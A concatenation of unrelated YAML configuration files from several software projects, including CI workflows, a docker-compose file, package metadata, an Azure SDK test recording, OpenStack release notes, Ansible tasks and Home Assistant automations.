- DB_PWD=<PASSWORD>
- ES_DATA_NODES_URL=http://ccd-elasticsearch:9200
- APPINSIGHTS_INSTRUMENTATIONKEY=dummy
networks:
- compose_default
kibana:
image: docker.elastic.co/kibana/kibana:6.3.0
container_name: kibana
ports:
- 5601:5601
depends_on:
- ccd-elasticsearch
# probate-man-database:
# build:
# context: ../docker/database
# ports:
# - 5344:5432
# healthcheck:
# test: psql -c 'select 1' -d postgres -U postgres
# retries: 2
# #mem_limit: 160m
# #memswap_limit: 0
# logstash-probateman:
# build: ../docker/logstash-probateman/.
# container_name: logstash-probateman
# command: bash -c "bin/logstash-plugin install logstash-filter-json_encode && docker-entrypoint -e"
# volumes:
# - ../docker/logstash-probateman/config/logstash.yml:/usr/share/logstash/config/logstash.yml:ro
# - ./../logstash:/usr/share/logstash/pipeline:ro
# environment:
# - DB_URL=jdbc:postgresql://probate-man-database:5432/probate_man
# - DB_USER=probate_man
# - DB_PWD=<PASSWORD>
# - ES_DATA_NODES_URL=elasticsearch
# depends_on:
# - ccd-elasticsearch
# - probate-man-database
# - ccd-api-gateway
# - ccd-definition-store-api
# - ccd-case-management-web
# - ccd-user-profile-api
# - ccd-data-store-api
volumes:
esdata1:
driver: local
networks:
compose_default:
external: true
|
compose/elasticsearch.yml
|
homepage: https://github.com/snowleopard/build
changelog-type: ''
hash: 84229529df8fa8e680fb53933cf0c8c065298979d48d7a14bb1c12cb79294783
test-bench-deps:
extra: ! '>=1.5.3 && <1.7'
base: ! '>=4.7 && <5'
build: -any
containers: ! '>=0.5.7.1 && <0.6'
mtl: ! '>=2.2.1 && <2.3'
transformers: ! '>=0.5.2.0 && <0.6'
maintainer: ! '<NAME> <<EMAIL>>, github: @snowleopard'
synopsis: Build systems a la carte
changelog: ''
basic-deps:
extra: ! '>=1.5.3 && <1.7'
base: ! '>=4.7 && <5'
filepath: ! '>=1.4.1.0 && <1.5'
containers: ! '>=0.5.7.1 && <0.6'
mtl: ! '>=2.2.1 && <2.3'
transformers: ! '>=0.5.2.0 && <0.6'
random: ! '>=1.1 && <1.2'
algebraic-graphs: ! '>=0.1.1 && <0.2'
all-versions:
- 0.0.1
- 0.0.1.1
- '1.0'
author: <NAME>, <NAME>, <NAME>
latest: '1.0'
description-type: markdown
description: ! "# Build Systems à la Carte\n\n[](https://hackage.haskell.org/package/build)
[](https://travis-ci.org/snowleopard/build)
[](https://ci.appveyor.com/project/snowleopard/build)\n\nThis
project provides an executable framework for developing and comparing build systems,
viewing them as\nrelated points in landscape rather than as isolated phenomena.
The code derives from the ICFP 2018 paper\n[\"Build Systems à la Carte\"](https://github.com/snowleopard/build-systems/releases/download/icfp-submission/build-systems.pdf).\n\n##
Getting Started\n\nYou may be interested to:\n\n* Run `stack test` to execute all
the provided build systems on a very simple example.\n* Run `stack haddock` to generate
HTML documentation of all the interfaces.\n* Read the code, particularly [System.hs](src/Build/System.hs)
which is the concrete implementation of\n all build systems. Following the imports
(or the\n [Haddock documentation](https://hackage.haskell.org/package/build)) will
lead you to all the\n constituent parts.\n\n## Further Activities\n\nThere aren't
really any. The code served as a proving ground for ideas, and its existence both
allows\nconfirmation that our conclusions are valid, and opportunity to cheaply
conduct further experiments. Although\nthe code is a useful adjoint to the paper,
it is not essential to it (other than we wouldn't have been\nable to discover what
we did without an executable specification).\n\n## Background Information\n\nThe
task abstraction is explored more completely in\n[this blog post](https://blogs.ncl.ac.uk/andreymokhov/the-task-abstraction/),
and the motivation behind\nthe project in [an earlier blog post](https://blogs.ncl.ac.uk/andreymokhov/cloud-and-dynamic-builds/).\n"
license-name: MIT
|
packages/bu/build.yaml
|
name: Proto
on:
push:
branches:
- master
pull_request:
branches:
- master
jobs:
generate:
name: Generate
runs-on: ubuntu-latest
steps:
- name: Release
id: release
uses: GoogleCloudPlatform/release-please-action@v3
with:
release-type: go
bump-minor-pre-major: true
bump-patch-for-minor-pre-major: true
pull-request-title-pattern: "release: ${version}"
- name: Checkout
uses: actions/checkout@v3
- name: Checkout PB
uses: actions/checkout@v3
if: ${{ github.event_name != 'pull_request' }}
with:
repository: go-sdk/pb
path: pb
token: ${{ secrets.PAGE_PAT }}
- name: Backup
if: ${{ github.event_name != 'pull_request' }}
run: mv pb/.git git_bak
- name: Cache
uses: actions/cache@v2
with:
path: |
~/.cache/buf
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-cache-${{ hashFiles('**/buf.lock') }}
- name: Go
uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Buf
uses: bufbuild/buf-setup-action@main
with:
github_token: ${{ github.token }}
- name: Buf Generate
run: make pb
- name: Restore
if: ${{ github.event_name != 'pull_request' }}
run: |
cd pb
mv ../git_bak .git
git config user.name github-actions[bot]
          git config user.email 41898282+github-actions[bot]@users.noreply.github.com
- name: Version
if: ${{ steps.release.outputs.release_created }}
run: |
version=v${{ steps.release.outputs.major }}.${{ steps.release.outputs.minor }}.${{ steps.release.outputs.patch }}
echo "PB_VERSION=$version" >> $GITHUB_ENV
sed -i "s|dev|$version|g" pb/version.go
- name: Commit
if: ${{ github.event_name != 'pull_request' }}
run: |
cd pb
git add -A
git commit -m "proto: ${{ github.event.head_commit.message }}"
git push -u origin master
- name: Create Tag
if: ${{ steps.release.outputs.release_created }}
run: |
cd pb
echo "new tag ${{ env.PB_VERSION }}"
git tag "${{ env.PB_VERSION }}"
git push origin "${{ env.PB_VERSION }}"
- name: Create Release
if: ${{ steps.release.outputs.release_created }}
run: |
curl -s -o /dev/null -X POST -H 'Authorization: token ${{ secrets.PAGE_PAT }}' -d '{"tag_name":"${{ env.PB_VERSION }}","name":"${{ env.PB_VERSION }}"}' -w "%{http_code}" https://api.github.com/repos/go-sdk/pb/releases
|
.github/workflows/proto.yml
|
{% set name = "km3pipe" %}
{% set version = "9.9.2" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
url: https://pypi.io/packages/source/{{ name[0] }}/{{ name }}/km3pipe-{{ version }}.tar.gz
sha256: 64458c2b34831c778f9d605b4f3b16c8b0d450afd65e71b17afba40dc2f0d3b1
build:
number: 0
noarch: python
entry_points:
- km3pipe=km3pipe.cmd:main
- pipeinspector=pipeinspector.app:main
- h5extract=km3pipe.utils.h5extract:main
- h5extractf=km3pipe.utils.h5extractf:main
- h5info=km3pipe.utils.h5info:main
- h5tree=km3pipe.utils.h5tree:main
- h5header=km3pipe.utils.h5header:main
- ztplot=km3pipe.utils.ztplot:main
- k40calib=km3pipe.utils.k40calib:main
- triggermap=km3pipe.utils.triggermap:main
- nb2sphx=km3pipe.utils.nb2sphx:main
- ligiermirror=km3pipe.utils.ligiermirror:main
- qrunprocessor=km3pipe.utils.qrunprocessor:main
- qrunqaqc=km3pipe.utils.qrunqaqc:main
- daqsample=km3pipe.utils.daqsample:main
- tres=km3pipe.utils.tres:main
script: {{ PYTHON }} -m pip install . -vv
requirements:
host:
- pip
- python >=3.6
- setuptools_scm
run:
- awkward >=1.4
- docopt
- h5py
- km3db >=0.6.0
- km3io >=0.20.0
- matplotlib-base >=3.0.0
- numba >=0.49.0
- numpy >=1.17.0
- particle >=0.8.0
- passlib
- python >=3.6
- requests
- setuptools >=40.6.2
- setuptools-scm
- pytables >=3.4.2
- thepipe >=1.3.5
- toml
- tqdm
- urwid
test:
imports:
- km3modules
- km3pipe
commands:
- pip check
- km3pipe --help
- pipeinspector --help
- h5extract --help
- h5extractf --help
- h5info --help
- h5tree --help
- h5header --help
- ztplot --help
- k40calib --help
- triggermap --help
- nb2sphx --help
- ligiermirror --help
- qrunprocessor --help
- qrunqaqc --help
- daqsample --help
- tres --help
requires:
- pip
about:
home: http://git.km3net.de/km3py/km3pipe
summary: An analysis framework for KM3NeT
license: MIT
license_file: LICENSE
extra:
recipe-maintainers:
- tamasgal
|
recipe/meta.yaml
|
name: 'Build Docker Image'
description: 'Builds and Pushes Docker Images with some Keptn Internals'
inputs:
IMAGE_NAME:
description: Image Name, e.g., keptn/some-service or keptn-contrib/some-service
required: true
DOCKER_FOLDER:
description: In case you are trying to build from a subfolder, set this to the subfolder (must end in a trailing slash)
default: './'
VERSION:
description: Semantic version used as the tag of the docker image
required: true
DATETIME:
description: Optional datetime for the tag of the docker image (will be set automatically if left empty)
default: unset
FILE:
description: Optional name of the Dockerfile
default: 'Dockerfile'
runs:
using: composite
steps:
- shell: bash
id: check_datetime
env:
DATETIME: ${{ inputs.DATETIME }}
run: |
if [[ "$DATETIME" == "unset" ]] || [[ "$DATETIME" == "" ]]; then
# generate datetime
echo Generating datetime using date command
echo "::set-output name=DATETIME::$(date +'%Y%m%d')$(date +'%H%M')"
else
# use provided datetime
echo Using provided datetime $DATETIME
echo "::set-output name=DATETIME::${DATETIME}"
fi
- shell: bash
id: check_docker_folder
env:
DOCKER_FOLDER: ${{ inputs.DOCKER_FOLDER }}
run: |
# ensure trailing slash in folder
if [[ "${DOCKER_FOLDER}" != */ ]]; then
echo "::error Please ensure that FOLDER has a trailing slash, e.g., ./ or api/"
exit 1
fi
- shell: bash
id: prepare_manifest
name: Prepare Build Manifest
env:
DOCKER_FOLDER: ${{ inputs.DOCKER_FOLDER }}
DATETIME: ${{ steps.check_datetime.outputs.DATETIME }}
run: |
${{ github.action_path }}/docker/writeManifest.sh ${{ github.action_path }}/docker/MANIFEST
cat ${{ github.action_path }}/docker/MANIFEST
# copy manifest
cp ${{ github.action_path }}/docker/MANIFEST ./${DOCKER_FOLDER}MANIFEST
if [[ $? -ne 0 ]]; then
echo "::error Could not find MANIFEST"
exit 1
fi
# copy entrypoint script
cp ${{ github.action_path }}/docker/entrypoint.sh ./${DOCKER_FOLDER}entrypoint.sh
- shell: bash
id: composite-action-build-docker-image
env:
IMAGE_NAME: ${{ inputs.IMAGE_NAME }}
DOCKER_FOLDER: ${{ inputs.DOCKER_FOLDER }}
VERSION: ${{ inputs.VERSION }}
DATETIME: ${{ steps.check_datetime.outputs.DATETIME }}
FILE: ${{ inputs.FILE }}
run: ${{ github.action_path }}/build_docker_image.sh "${IMAGE_NAME}" "${DOCKER_FOLDER}" "${VERSION}" "${DATETIME}" "${FILE}"
|
action.yml
|
---
version: 1
rwmutex: {}
interactions:
- request:
body: ""
form: {}
headers:
Authorization:
- SharedKey golangrocksonazure:/aMWaS2dFJEZNJGcSuViOUfzPef2ZUpgeD3U92j/Hwg=
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo?restype=container
method: PUT
response:
body: ""
headers:
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Etag:
- '"0x8D47C73B9F9B36A"'
Last-Modified:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Request-Id:
- 5eac2c6a-0001-00d8-685c-aea568000000
X-Ms-Version:
- 2016-05-31
status: 201 Created
code: 201
- request:
body: ""
form: {}
headers:
Authorization:
- SharedKey golangrocksonazure:<KEY>
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo/blob/138storageblobsuitetestgetblobproperties
method: HEAD
response:
body: ""
headers:
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Request-Id:
- 5eac2c8d-0001-00d8-075c-aea568000000
X-Ms-Version:
- 2016-05-31
status: 404 The specified blob does not exist.
code: 404
- request:
body: Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer
form: {}
headers:
Authorization:
- SharedKey golangrocksonazure:<KEY>
Content-Length:
- "64"
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Blob-Type:
- BlockBlob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo/blob/238storageblobsuitetestgetblobproperties
method: PUT
response:
body: ""
headers:
Content-Md5:
- k5xcYcwrRU0Jp851wBBhJg==
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Etag:
- '"0x8D47C73B9F3A49E"'
Last-Modified:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Request-Id:
- 5eac2cad-0001-00d8-235c-aea568000000
X-Ms-Request-Server-Encrypted:
- "false"
X-Ms-Version:
- 2016-05-31
status: 201 Created
code: 201
- request:
body: ""
form: {}
headers:
Authorization:
- SharedKey golang<PASSWORD>:<KEY>
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo/blob/238storageblobsuitetestgetblobproperties
method: HEAD
response:
body: ""
headers:
Accept-Ranges:
- bytes
Content-Length:
- "64"
Content-Md5:
- k5xcYcwrRU0Jp851wBBhJg==
Content-Type:
- application/octet-stream
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Etag:
- '"0x8D47C73B9F3A49E"'
Last-Modified:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Blob-Type:
- BlockBlob
X-Ms-Lease-State:
- available
X-Ms-Lease-Status:
- unlocked
X-Ms-Request-Id:
- 5eac2cca-0001-00d8-3d5c-aea568000000
X-Ms-Server-Encrypted:
- "false"
X-Ms-Version:
- 2016-05-31
status: 200 OK
code: 200
- request:
body: ""
form: {}
headers:
Authorization:
- SharedKey golangrocksonazure:xd4tWwfwPL5s9t3qRWG4jEOb7ftlL/J2J6XjCurknUk=
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo?restype=container
method: DELETE
response:
body: ""
headers:
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Request-Id:
- 5eac2cda-0001-00d8-4c5c-aea568000000
X-Ms-Version:
- 2016-05-31
status: 202 Accepted
code: 202
|
vendor/github.com/Azure/azure-sdk-for-go/storage/recordings/StorageBlobSuite/TestGetBlobProperties.yaml
|
name: Tests
on: [push, pull_request]
jobs:
isort:
name: Check imports order
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Setup python 3.10
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Run isort
uses: isort/isort-action@master
with:
configuration: "."
- uses: stefanzweifel/git-auto-commit-action@v4
name: autocommit
with:
commit_message: ":construction_worker: Sort imports"
black_formatter:
name: Run Black formatter
runs-on: ubuntu-latest
needs: [isort]
steps:
- uses: actions/checkout@v2
- name: Check files with black formatter
uses: rickstaa/action-black@v1
id: action_black
with:
black_args: "."
- uses: stefanzweifel/git-auto-commit-action@v4
name: autocommit
with:
commit_message: ":construction_worker: Automated Commit"
flake8_linter:
name: Flake8 linter
runs-on: ubuntu-latest
needs: [black_formatter]
steps:
- uses: actions/checkout@v3
- name: Setup python environment.
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Pull modifications
run: git pull
- name: Check files with flake8 linter
uses: py-actions/flake8@v2
with:
ignore: "F401"
max-line-length: "100"
path: "src" # tests ??
mypy_type_check:
name: MyPy type checking
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Setup python 3.10
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Install dependencies
run: |
pip install -r requirements.txt
- name: MyPy
run: |
mypy src/
tests:
name: Run tests with PyTest library
strategy:
matrix:
os: [ubuntu-latest, windows-latest, macos-latest]
runs-on: ${{ matrix.os }}
needs: [black_formatter, flake8_linter, mypy_type_check]
steps:
- uses: actions/checkout@v3
- name: Setup python 3.10
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Install dependencies
run: |
pip install -r requirements.txt
- name: Run tests
run: |
python -m pytest --cov=./ --cov-report=xml
- name: Upload coverage to Codecov
uses: codecov/codecov-action@v2
with:
token: ${{ secrets.CODECOV_TOKEN }}
directory: ./coverage/reports/
env_vars: OS,PYTHON
fail_ci_if_error: true
files: ./coverage.xml
flags: unittests
name: codecov-umbrella
verbose: true
|
.github/workflows/workflow.yml
|
---
prelude: |
The 20.0.0 release includes many new features and bug fixes. Please be
sure to read the upgrade section which describes the required actions to
upgrade your cloud from 19.0.0 (Stein) to 20.0.0 (Train).
There are a few major changes worth mentioning. This is not an exhaustive
list:
- The latest Compute API microversion supported for Train is v2.79. Details
on REST API microversions added since the 19.0.0 Stein release can be
found in the `REST API Version History`_ page.
- Live migration support for servers with a
`NUMA topology, pinned CPUs <https://docs.openstack.org/nova/latest/admin/cpu-topologies.html>`_
and/or `huge pages <https://docs.openstack.org/nova/latest/admin/huge-pages.html>`_,
when using the libvirt compute driver.
- Live migration support for servers with
`SR-IOV ports <https://docs.openstack.org/neutron/latest/admin/config-sriov>`_
attached when using the libvirt compute driver.
- Support for cold migrating and resizing servers with bandwidth-aware
`Quality of Service ports <https://docs.openstack.org/api-guide/compute/port_with_resource_request.html>`_
attached.
- Improvements to the scheduler for more intelligently filtering
`results from the Placement service <https://docs.openstack.org/nova/latest/admin/configuration/schedulers.html#prefiltering>`_.
- Improved multi-cell resilience with the ability to
`count quota usage <https://docs.openstack.org/nova/latest/user/quotas.html#quota-usage-from-placement>`_
using the Placement service and API database.
- A new framework supporting hardware-based encryption of guest memory
to protect users against attackers or rogue administrators snooping on
their workloads when using the libvirt compute driver. Currently only has
basic support for
`AMD SEV (Secure Encrypted Virtualization) <https://docs.openstack.org/nova/latest/admin/configuration/hypervisor-kvm.html#amd-sev-secure-encrypted-virtualization>`_.
- Improved `operational tooling <https://docs.openstack.org/nova/latest/cli/nova-manage.html>`_
for things like archiving the database and healing instance resource
allocations in Placement.
- Improved coordination with the baremetal service during external node
`power cycles <https://docs.openstack.org/ironic/latest/admin/power-sync.html>`_.
- Support for
`VPMEM (Virtual Persistent Memory) <https://docs.openstack.org/nova/latest/admin/virtual-persistent-memory.html>`_
when using the libvirt compute driver. This provides data persistence
across power cycles at a lower cost and with much larger capacities than
DRAM, especially benefitting HPC and memory databases such as redis,
rocksdb, oracle, SAP HANA, and Aerospike.
- It is now possible to place CPU pinned and unpinned servers on the same
compute host when using the libvirt compute driver. See the
`admin guide <https://docs.openstack.org/nova/latest/admin/cpu-topologies.html#configuring-libvirt-compute-nodes-for-cpu-pinning>`_
for details.
- Nova no longer includes Placement code. You must use the extracted
Placement service. See the `Placement extraction upgrade instructions`_
for details.
- The XenAPI virt driver is now deprecated and may be removed in a future
release as its quality can not be ensured due to lack of maintainers.
- The ``nova-consoleauth`` service has been removed as it was deprecated
since the 18.0.0 (Rocky) release.
- The deprecated ``Cells V1`` feature (not to be confused with `Cells V2`_)
has been removed.
.. _REST API Version History: https://docs.openstack.org/nova/latest/reference/api-microversion-history.html
.. _Placement extraction upgrade instructions: https://docs.openstack.org/placement/latest/upgrade/to-stein.html
.. _Cells V2: https://docs.openstack.org/nova/latest/user/cells.html
|
releasenotes/notes/train-prelude-3db0f5f6a75cc57a.yaml
|
- name: Create {{ bigip_namespace }} namespace
k8s:
state: present
definition:
apiVersion: v1
kind: Namespace
metadata:
name: "{{ bigip_namespace }}"
- name: Create bridges and network
include_tasks: 41_bigip_bridge_network.yml
- name: Create data volume for VMs
include_tasks: 42_bigip_data_volume.yml
- name: Setup BIGIP mgmt VLAN in provisioner
include_tasks: 43_provisioner_network.yml
- name: Create BIGIP VMs
include_tasks: 45_bigip_vm.yml
- name: Add all bigip hosts to inventory
add_host:
hostname: "{{ item.key }}.{{ bigip_base_domain }}"
ansible_host: "{{ item.value.mgmt_ip | ipaddr('address') }}"
license_key: "{{ item.value.license_key }}"
bigip_user: "{{ bigip_user }}"
bigip_password: "{{ <PASSWORD> }}"
bigip_base_domain: "{{ bigip_base_domain }}"
groups:
- 'bigip'
loop: "{{ bigip_vms | dict2items }}"
- name: Generate stablcurco1_dns46.tcl
template:
src: stablcurco1_dns46.tcl.j2
dest: "/tmp/stablcurco1_dns46.tcl"
- name: Generate stablcurco1_nat46.tcl
copy:
src: stablcurco1_nat46.tcl
dest: "/tmp/stablcurco1_nat46.tcl"
- block:
- name: detect python interpreter
shell: |
/usr/bin/python --version
register: python_version
ignore_errors: true
delegate_to: localhost
- name: set python version
shell: |
{{ (python_version.stderr_lines|length > 0 and 'Python' in python_version.stderr) | ternary('/usr/bin/python', '/usr/libexec/platform-python') }} --version | awk '{print $2}'
register: python_version
become: true
delegate_to: localhost
- name: Install required packages
yum:
name: "patch"
state: present
update_cache: true
disable_gpg_check: yes
become: true
delegate_to: localhost
- name: install galaxy module
shell: "ansible-galaxy collection install ansible.posix"
become: true
delegate_to: localhost
- name: Patch ansible module
patch:
src: "{{ role_path }}/files/bigip_device_license-{{ python_version.stdout.split('.')[0] }}.{{ python_version.stdout.split('.')[1] }}.patch"
dest: "/usr/lib/python{{ python_version.stdout.split('.')[0] }}.{{ python_version.stdout.split('.')[1] }}/site-packages/ansible/modules/network/f5/bigip_device_license.py"
become: true
delegate_to: localhost
when:
- bigip_module_patch | default(true) | bool
# - name: Set MCP {{ bigip_worker_mcp }} MaxUnavailable to default 1
# shell: |
# oc patch mcp {{ bigip_worker_mcp }} --type='merge' --patch="{\"spec\":{\"maxUnavailable\": 1 }}"
|
ansible/roles/bigip-ingress-setup/tasks/40_bigip_setup.yml
|
dependencies:
'@sane-fmt/wasm32-wasi': 0.7.0
'@tools/places': 'link:../places'
exec-inline: 0.0.5
lockfileVersion: 5.2
packages:
/@sane-fmt/wasm32-wasi/0.7.0:
dependencies:
'@types/node': 13.13.15
'@wasmer/wasi': 0.11.2
tslib: 2.0.0
dev: false
hasBin: true
resolution:
integrity: sha512-QtQ6JhPfRRmMT38Gt1WiU+hK4ClVuFGX1nbcsiIANav/S3slm1K4SC337a87tPEZDKrwFoODrZ5DwQeAxbQKyA==
/@types/node/13.13.15:
dev: false
resolution:
integrity: sha512-kwbcs0jySLxzLsa2nWUAGOd/s21WU1jebrEdtzhsj1D4Yps1EOuyI1Qcu+FD56dL7NRNIJtDDjcqIG22NwkgLw==
/@wasmer/wasi/0.11.2:
dependencies:
browser-process-hrtime: 1.0.0
buffer-es6: 4.9.3
path-browserify: 1.0.1
randomfill: 1.0.4
dev: false
resolution:
integrity: sha512-9Oi68ZsD8HTZRjWj5VvnhN0dLL6nSacrgGvdwJeHd9q5bMrlFaXTckQAYm84zXJWg+b5yeFhaEZqGEhe7q4VFQ==
/browser-process-hrtime/1.0.0:
dev: false
resolution:
integrity: sha512-9o5UecI3GhkpM6DrXr69PblIuWxPKk9Y0jHBRhdocZ2y7YECBFCsHm79Pr3OyR2AvjhDkabFJaDJMYRazHgsow==
/buffer-es6/4.9.3:
dev: false
resolution:
integrity: sha1-8mNHuC33b9N+GLy1KIxJcM/VxAQ=
/exec-inline/0.0.5:
dependencies:
'@types/node': 13.13.15
tslib: 1.13.0
dev: false
engines:
node: '>= 8.9.0'
resolution:
integrity: sha512-g7eEPrhCbkBJoYb8PG4aZeRXog1HYptBNNfwN1bRmzYWtu5dNQniqcmwClBhb6YWg3X/wrOnzmKJSPUbZYsKJg==
/path-browserify/1.0.1:
dev: false
resolution:
integrity: sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==
/randombytes/2.1.0:
dependencies:
safe-buffer: 5.2.1
dev: false
resolution:
integrity: sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==
/randomfill/1.0.4:
dependencies:
randombytes: 2.1.0
safe-buffer: 5.2.1
dev: false
resolution:
integrity: sha512-87lcbR8+MhcWcUiQ+9e+Rwx8MyR2P7qnt15ynUlbm3TU/fjbgz4GsvfSUDTemtCCtVCqb4ZcEFlyPNTh9bBTLw==
/safe-buffer/5.2.1:
dev: false
resolution:
integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==
/tslib/1.13.0:
dev: false
resolution:
integrity: sha512-<KEY>==
/tslib/2.0.0:
dev: false
resolution:
integrity: sha512-lTqkx847PI7xEDYJntxZH89L2/aXInsyF2luSafe/+0fHOMjlBNXdH6th7f70qxLDhul7KZK0zC8V5ZIyHl0/g==
specifiers:
'@sane-fmt/wasm32-wasi': ^0.7.0
'@tools/places': 'file:../places'
exec-inline: ^0.0.5
|
tools/sane-fmt/pnpm-lock.yaml
|
#scenarie for å starte dagen
- alias: '<NAME>'
trigger:
platform: time
at: '07:00'
action:
- service: homeassistant.turn_off
entity_id: group.underetasjen
- service: homeassistant.turn_on
entity_id: group.gangogsov
- service: homeassistant.turn_on
entity_id: light.skatollet
- service: homeassistant.turn_on
entity_id: switch.bildelys
- service: light.turn_on
entity_id: light.level
data:
brightness: 40
#scenarie der folk er hjemme og solen er gått ned
- alias: 'Ettermiddag, er hjemme'
trigger:
- platform: sun
event: sunset
offset: '-02:00:00'
- platform: state
entity_id: alarm_control_panel.sector_alarm_01166457
to: 'disarmed'
condition:
- condition: state
entity_id: alarm_control_panel.sector_alarm_01166457
state: 'disarmed'
- condition: time
after: '14:00:00'
before: '22:59:00'
action:
- service: homeassistant.turn_on
entity_id: group.underetasjen
data:
brightness: 90
- service: homeassistant.turn_on
entity_id: group.stuen
- service: light.turn_on
entity_id: light.level
data:
brightness: 25
#scenarie der folk ikke er hjemme og solen er gått ned
- alias: 'Ettermiddag, stille i huset'
hide_entity: True
trigger:
- platform: sun
event: sunset
condition:
- condition: state
entity_id: alarm_control_panel.sector_alarm_01166457
state: 'armed_away'
action:
- service: homeassistant.turn_on
entity_id: group.stuen
- service: light.turn_on
entity_id: light.level
data:
brightness: 15
# scenarie for stille i huset
- alias: 'Natt og dag'
trigger:
- platform: time
at: '08:30'
- platform: time
at: '23:00'
action:
- service: homeassistant.turn_off
entity_id: group.underetasjen
- service: homeassistant.turn_off
entity_id: group.stuen
- service: homeassistant.turn_off
entity_id: group.gangogsov
- service: light.turn_on
entity_id: light.level
data:
brightness: 15
#varsler når det er bevegelse på hjemmekontor og alarmen er på
- alias: 'Alarm på og bevegelse, varsling'
hide_entity: True
trigger:
- platform: state
entity_id: binary_sensor.sensor
to: 'on'
condition:
- condition: state
entity_id: alarm_control_panel.sector_alarm_01166457
state: 'armed_home'
action:
- service: light.turn_on
entity_id: light.hue_iris
data:
brightness: 80
rgb_color: [255, 0, 0]
- service: notify.pushover
data:
title: "Bevegelse på hjemmekontor"
message: "Alarm på, bevegelse på hjemmekontor"
data:
# url: "https://www.home-assistant.io/"
# sound: pianobar
priority: 0
#varsler når ny device legges til
- alias: 'Ny enhet'
hide_entity: True
trigger:
- platform: event
event_type: device_tracker_new_device
# condition:
action:
- service: notify.pushover
data_template:
title: Ny enhet på nettverket
message: >
Ny enhet:
{{trigger.event.data.host_name}}
({{trigger.event.data.entity_id}})
#varsler når ny magnetsensor1 trigges
- alias: 'Magnetsensor1'
hide_entity: True
trigger:
- platform: state
entity_id: binary_sensor.sensor_2
to: 'on'
# condition:
action:
- service: notify.pushover
data_template:
title: Magnetsensor 1 er åpnet
message: >
          Magnetsensor 1 er åpnet
#varsler når ny magnetsensor1 trigges
- alias: 'Magnetsensor2'
hide_entity: True
trigger:
- platform: state
entity_id: binary_sensor.sensor_3
to: 'on'
# condition:
action:
- service: notify.pushover
data_template:
title: Magnetsensor 2 er åpnet
message: >
          Magnetsensor 2 er åpnet
|
automations.yaml
|
- set_fact:
internal_postgres: "{{ V4_CFG_POSTGRES_SERVERS.default.internal }}"
tags:
- install
- uninstall
- update
- name: postgres - gcp cloud-sql-proxy
include_tasks: gcp-cloud-sql-proxy.yaml
vars:
role: "{{ item.key }}"
settings: "{{ item.value }}"
with_dict: "{{ V4_CFG_POSTGRES_SERVERS }}"
when:
- not item.value.internal
- "'service_account' in item.value"
- item.value.service_account is defined
- V4_CFG_CLOUD_SERVICE_ACCOUNT_NAME is defined
- PROVIDER == "gcp"
tags:
- install
- uninstall
- update
- name: postgres - pre 2021.1.4
block:
- name: postgres - internal
overlay_facts:
cadence_name: "{{ V4_CFG_CADENCE_NAME }}"
cadence_number: "{{ V4_CFG_CADENCE_VERSION }}"
existing: "{{ vdm_overlays }}"
add:
- { resources: "overlays/internal-postgres" }
- { resources: "overlays/crunchydata" }
- { transformers: "overlays/internal-postgres/internal-postgres-transformer.yaml" }
- { transformers: "postgres-storage-transformer.yaml", vdm: true, max: "2020.1.3" }
- { transformers: "postgres-storage-transformer.v2.yaml", vdm: true, min: "2020.1.3"}
when:
- internal_postgres
- name: postgres - external
overlay_facts:
cadence_name: "{{ V4_CFG_CADENCE_NAME }}"
